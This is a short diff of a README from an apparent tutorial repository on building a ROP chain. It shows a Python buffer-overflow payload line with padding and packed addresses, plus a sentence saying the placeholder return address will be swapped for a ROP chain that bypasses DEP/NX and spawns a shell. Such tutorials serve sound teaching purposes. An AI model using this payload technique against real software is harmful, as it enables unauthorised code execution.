dannyc-dev/Building-the-ROP-Chain/README.md

     payload = 'A' * off_printf1 + p64(0xc82003bd60) + p64(0x8) + 'A' * off_printf2 + p64(0xc82003bd60) + p64(0x8) + 'A' *
     off_retaddress + p64(0xdeadbeef)

-In our final payload we will change p64(0xdeadbeef) with our ROP chain to bypass the DEP/NX protection on our executable:
+In our final payload we will change p64(0xdeadbeef) with our ROP chain to bypass the DEP/NX protection on our executable and invoke our shell:

 ![alt text](screenshot/3.png)